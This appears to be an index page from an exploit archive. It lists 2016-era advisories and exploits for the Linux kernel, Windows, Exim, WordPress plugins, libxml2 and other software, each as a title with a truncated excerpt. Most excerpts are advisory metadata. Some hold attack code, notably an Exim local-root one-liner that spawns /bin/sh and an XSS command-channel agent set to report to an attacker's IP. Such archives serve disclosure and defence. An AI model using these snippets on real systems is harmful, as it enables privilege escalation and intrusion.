Linux Kernel 3.10.0 (CentOS RHEL 7.1) - Wacom Multiple Nullpointer Dereferences

Linux Kernel 3.10.0 CentOS RHEL 7.1 - Wacom Multiple Nullpointer Dereferences OS-S Security Advisory 2016-11 Linux wacom multiple Nullpointer Dereferences Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...

Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption

Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption Title: Adobe Digital Editions = 4.5.0 - Critical memory corruption Application: Adobe Digital Editions Version: 4.5.0 and earlier versions Platform: Windows, Macintosh, iOS and Android Software Link:...

Linux Kernel 3.10.0 (CentOS RHEL 7.1) - cdc_acm Nullpointer Dereference

Linux Kernel 3.10.0 CentOS RHEL 7.1 - cdcacm Nullpointer Dereference OS-S Security Advisory 2016-06 Linux cdcacm Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C Title: Local RedHa...

Linux Kernel 3.10.0 (CentOS RHEL 7.1) - digi_acceleport Nullpointer Dereference

Linux Kernel 3.10.0 CentOS RHEL 7.1 - digiacceleport Nullpointer Dereference OS-S Security Advisory 2016-12 Linux digiacceleport Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...

Linux Kernel 3.10.0 (CentOS RHEL 7.1) - cypress_m8 Nullpointer Dereference

Linux Kernel 3.10.0 CentOS RHEL 7.1 - cypressm8 Nullpointer Dereference OS-S Security Advisory 2016-07 Linux cypressm8 Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C Title: Local...

Exim 4.84-3 - Local Privilege Escalation

Exim 4.84-3 - Local Privilege Escalation !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...

Linux Kernel 3.103.18 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption

Linux Kernel 3.103.18 4.4 - Netfilter IPTSOSETREPLACE Memory Corruption Source: https://code.google.com/p/google-security-research/issues/detail?id=758 A memory corruption vulnerability exists in the IPTSOSETREPLACE ioctl in the netfilter code for iptables support. This ioctl is can be triggered ...

WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities

WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 === LSE Leading Security Experts GmbH - Security Advisory 2016-01-01 === Wordpress ProjectTheme Multiple Vulnerabilities - -...

Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference

Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor clie5attach Nullpointer Dereference OS-S Security Advisory 2016-09 Linux visor clie5attach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2015-7566 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...

Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor treo_attach Nullpointer Dereference

Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor treoattach Nullpointer Dereference OS-S Security Advisory 2016-10 Linux visor treoattach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2016-2782 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...

Cerberus Helpdesk (Cerb5) 5 6.7 - Password Hash Disclosure

Cerberus Helpdesk Cerb5 5 6.7 - Password Hash Disclosure !/bin/bash Exploit Title: Cerberus Helpdesk Cerb5 Password Hash Grabbing Date: 04.02.2016 Exploit Author: asdizzle Vendor Homepage: http://www.cerberusweb.com/ Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-544.zip...

Microsoft Windows 7 (x64) - afd.sys Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 7 x64 - afd.sys Dangling Pointer Privilege Escalation MS14-040 Exploit Title: MS14-040 - AFD.SYS Dangling Pointer Date: 2016-03-03 Exploit Author: Rick Larabee Vendor Homepage: www.microsoft.com Version: Windows 7, 64 bit Tested on: Win7 x64 afd.sys - 6.1.7601.17514 ntdll.dll -...

McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass

McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass / Security Advisory @ Mediaservice.net Srl 01, 13/04/2016 Data Security Division Title: McAfee VirusScan Enterprise security restrictions bypass Application: McAfee VirusScan Enterprise 8.8 and prior versions Platform: Microsoft Windo...

Avast! - Authenticode Parsing Memory Corruption

Avast! - Authenticode Parsing Memory Corruption Source: https://code.google.com/p/google-security-research/issues/detail?id=668 The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing. 474.c0c: Access violation - code c0000005 first chance First chance...

Wireshark - wtap_optionblock_free Use-After-Free

Wireshark - wtapoptionblockfree Use-After-Free Source: https://code.google.com/p/google-security-research/issues/detail?id=739 The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark current git master, by feeding a malformed file to tshark "$ ./tshark...

ATutor LMS - install_modules.php Cross-Site Request Forgery Remote Code Execution

ATutor LMS - installmodules.php Cross-Site Request Forgery Remote Code Execution / exp.js ATutor LMS " in it - You will need to set the Access-Control-Allow-Origin header to allow the target to pull zips - Use this with your favorite XSS attack - Student proof, aka bullet proof Timeline: 23/02/20...

PHPLib 7.4 - SQL Injection

PHPLib 7.4 - SQL Injection PHPLib SQL Injection Vendor: PHPLib Product: PHPLib Version: newid=true; $this-name = $this-cookiename==""?$this-classname:$this-cookiename; if "" == $id $this-newid=false; switch $this-mode case "get": $id = isset$HTTPGETVARS$this-name ?...

WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation

WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation ''' Exploit Title: WordPress Bulk Delete Plugin Privilege Escalation Discovery Date: 2016-02-10 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://bulkwp.com/ Software Link:...

DropBearSSHD 2015.71 - Command Injection

DropBearSSHD 2015.71 - Command Injection VuNote ============ Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 Version: 0.2 Date: Mar 3rd, 2016 Tag: dropbearsshd xauth command injection may lead to forced-command bypass Overview -------- Name: dropbear Vendor: Matt...

Schneider Electric SBO AS - Multiple Vulnerabilities

Schneider Electric SBO AS - Multiple Vulnerabilities Exploit Title: Schneider Electric SBO / AS Multiple Vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: www.schneider-electric.com Versions Reported: Automation Server Series AS, AS-P, v1.7 and prior CVE-ID: CVE-2016-2278 About...

Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation

Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation Source: https://github.com/Cr4sh/secretnetexpl Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit. 0day vulnerabilities in sncc0.sys kernel driver of Secrity Code products allows attacker to perform local...

Quick Tftp Server Pro 2.3 - Read Mode Denial of Service

Quick Tftp Server Pro 2.3 - Read Mode Denial of Service Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow DoS Date: 21/01/2016 Exploit Author: Guillaume Kaddouch Twitter: @gkweb76 Blog: https://networkfilter.blogspot.com GitHub: https://github.com/gkweb76/exploits Vendor Homepage...

PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash (PoC)

PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC Date: 01-03-2016 Exploit Author: redknight99 Vendor Homepage: http://www.picturetrail.com/ Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe Versio...

Gallery 2 2.0.2 - Multiple Vulnerabilities

Gallery 2 2.0.2 - Multiple Vulnerabilities Gallery 2 Multiple Vulnerabilities Vendor: Bharat Mediratta Product: Gallery 2 Version: = 2.0.2 Website: http://gallery.menalto.com/ BID: 16940 CVE: CVE-2006-1127 CVE-2006-1128 OSVDB: 23596 23597 SECUNIA: 19104 PACKETSTORM: 44358 Description: Gallery2, t...

FreeProxy Internet Suite 4.10 - Denial of Service

FreeProxy Internet Suite 4.10 - Denial of Service Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS Date: 01/03/2016 Exploit Author: Guillaume Kaddouch Twitter: @gkweb76 Blog: https://networkfilter.blogspot.com GitHub: https://github.com/gkweb76/exploits Vendor Homepage:...

WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities

WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS Date: 2016-02-22 Google Dork: Index of /wp-content/plugins/cp-polls/ Exploit Author: Joaquin Ramirez Martinez i0akiN SEC-LABORATORY Plugin URI:...

Crouzet em4 soft 1.1.04 M3 soft 3.1.2.0 - Insecure File Permissions

Crouzet em4 soft 1.1.04 M3 soft 3.1.2.0 - Insecure File Permissions Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions Vendor: Crouzet Automatismes SAS Product web page: http://www.crouzet-automation.com Affected version: em4 soft 1.1.04 and 1.1.03.01 M3 soft 3.1.2.0 Summary:...

Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero

Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero Crouzet em4 soft 1.1.04 Integer Division By Zero Vendor: Crouzet Automatismes SAS Product web page: http://www.crouzet-automation.com Affected version: 1.1.04 and 1.1.03.01 Summary: em4 is more than just a nano-PLC. It is a leading edge...

Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)

Viscomsoft Calendar Active-X 2.0 - Multiple Crashes PoC Exploit Title: Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs Date: 01-03-2016 Exploit Author: Shantanu Khandelwal Twitter: @shantanu561993 Vendor Homepage: http://www.viscomsoft.com/ Software Link:...

WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery

WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery Date: 28-02-2016 Software Link: https://wordpress.org/support/plugin/more-fields Exploit Author: Aatif Shahdad Twitter: https://twitter.com/61617469665f736...

Comodo Anti-Virus - SHFolder.dll Local Privilege Escalation

Comodo Anti-Virus - SHFolder.dll Local Privilege Escalation ...... ,;''''''''''''''''';, .;''''''''''''''''''''''''''', :''''''''+';:,..,:;'''''''''': ,;'''''';,. ,;'''''';: :'''''',. ,'''''';. ;+''+': ,; ,''''';. ;'''';. .:;' . ;'''''. :+'''; ,:+'' ';;',''; :''''; .''''; ,';' '':' ';,''',' :'''...

WordPress Plugin Ocim MP3 - SQL Injection

WordPress Plugin Ocim MP3 - SQL Injection ======== Ocim MP3 Plugin SQL Injection Vulnerability ======== :----------------------------------------------------------------------------------------------------: : Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability : Date : 26 February 2016 :...

phpRPC 0.7 - Remote Code Execution

phpRPC 0.7 - Remote Code Execution phpRPC Remote Code Execution Vendor: Robert Hoffman Product: phpRPC Version: = 0.7 Website: http://sourceforge.net/projects/phprpc/ BID: 16833 CVE: CVE-2006-1032 OSVDB: 23514 SECUNIA: 19028 PACKETSTORM: 44267 Description: phpRPC is meant to be an easy to use...

Wireshark - print_hex_data_buffer print_packet Use-After-Free

Wireshark - printhexdatabuffer printpacket Use-After-Free Source: https://code.google.com/p/google-security-research/issues/detail?id=651 The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark current git master, by feeding a malformed file to tshark "...

Zimbra 8.0.9 GA - Cross-Site Request Forgery

Zimbra 8.0.9 GA - Cross-Site Request Forgery ====================================== Multiple CSRF in Zimbra Mail interface ====================================== CVE-2015-6541 Description =========== Multiple CSRF vulnerabilities have been found in the Mail interface of Zimbra 8.0.9 GA Release,...

Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities

Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities Vendor: Infor Product web page: http://www.infor.com Affected version: 8.2.0.1136 Summary: Infor® CRM, formerly Saleslogix, is an award-winning customer...

Agent-XSS

An XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At a technical level, it is a type of AJAX application which can obtain commands, send responses back and is able to talk cross-domain. // Exploit Pack server - Change 127.0.0.1 to your IP...

Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow

Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow / Source: https://code.google.com/p/google-security-research/issues/detail?id=734 The Adreno GPU driver for the MSM Linux kernel contains a heap overflow in the IOCTLKGSLPERFCOUNTERQUERY ioctl command. The bug results from an...

Agent-VBS

An XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At a technical level, it is a type of AJAX application which can obtain commands, send responses back and is able to talk cross-domain. 'Exploit Pack VBS Agent code + Web IE Object - Juan...

Linux Kernel - io_submit L2TP sendmsg Integer Overflow

Linux Kernel - iosubmit L2TP sendmsg Integer Overflow / Source: https://code.google.com/p/google-security-research/issues/detail?id=735 In certain kernel versions it is possible to use the AIO subsystem iosubmit syscall to pass size values larger than MAXRWCOUNT to the networking subsystem's...

Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067)

Microsoft Windows - NetAPI32.dll Code Execution Python MS08-067 import struct import time import sys from threading import Thread Thread is imported incase you would like to modify try: from impacket import smb from impacket import uuid from impacket import dcerpc from impacket.dcerpc.v5 import...

Microsoft Windows - srv2.sys SMB Code Execution (Python) (MS09-050)

Microsoft Windows - srv2.sys SMB Code Execution Python MS09-050 EDB-Note: Source https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09050.py !/usr/bin/python This module depends on the linux command line program smbclient. I can't find a python smb library for smb login. If you can find...

Centreon 2.5.3 - Remote Command Execution

Centreon 2.5.3 - Remote Command Execution Unauthenticated Remote Command Execution in Centreon Web Interface ================================================================== Description =========== Centreon is a popular monitoring solution. A critical vulnerability has been found in the Centreo...

GpicView 0.2.5 - Crash (PoC)

GpicView 0.2.5 - Crash PoC !/usr/bin/python Exploit Title: GpicView Buffer Overflow DOS Date: 25th February 2016 Exploit Author: David Silveiro Xino.co.uk Vendor Homepage: lxde.sourceforge.net/gpicview/ Software Link:...

Proxmox VE 34 - Insecure Hostname Checking Remote Command Execution

Proxmox VE 34 - Insecure Hostname Checking Remote Command Execution ===================================================================== Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit, XSS, Privileges escalation =====================================================================...

Joomla! Component com_poweradmin 2.3.0 - Multiple Vulnerabilities

Joomla! Component compoweradmin 2.3.0 - Multiple Vulnerabilities --------------------------------------------------------- RatioSec Research Security Advisory RS-2016-001 --------------------------------------------------------- JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF a...

IBM Lotus Domino R8 - Password Hash Extraction

IBM Lotus Domino R8 - Password Hash Extraction Exploit Title: IBM Lotus Domino = R8 Password Hash Extraction Exploit Google Dork: inurl:names.nsf?opendatabase Date: 02-24-2016 Exploit Author: Jonathan Broche Contact: https://twitter.com/g0jhonny Vendor Homepage:...

libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread

libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread Source: https://code.google.com/p/google-security-research/issues/detail?id=639 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 2.9.3, released 4 days ago, ...

libxml2 - xmlParseEndTag2 Heap Buffer Overread

libxml2 - xmlParseEndTag2 Heap Buffer Overread Source: https://code.google.com/p/google-security-research/issues/detail?id=638 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 2.9.3, released 4 days ago, by feeding a...

libxml2 - xmlDictAddString Heap Buffer Overread

libxml2 - xmlDictAddString Heap Buffer Overread Source: https://code.google.com/p/google-security-research/issues/detail?id=637 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 2.9.3, released 4 days ago, by feeding a...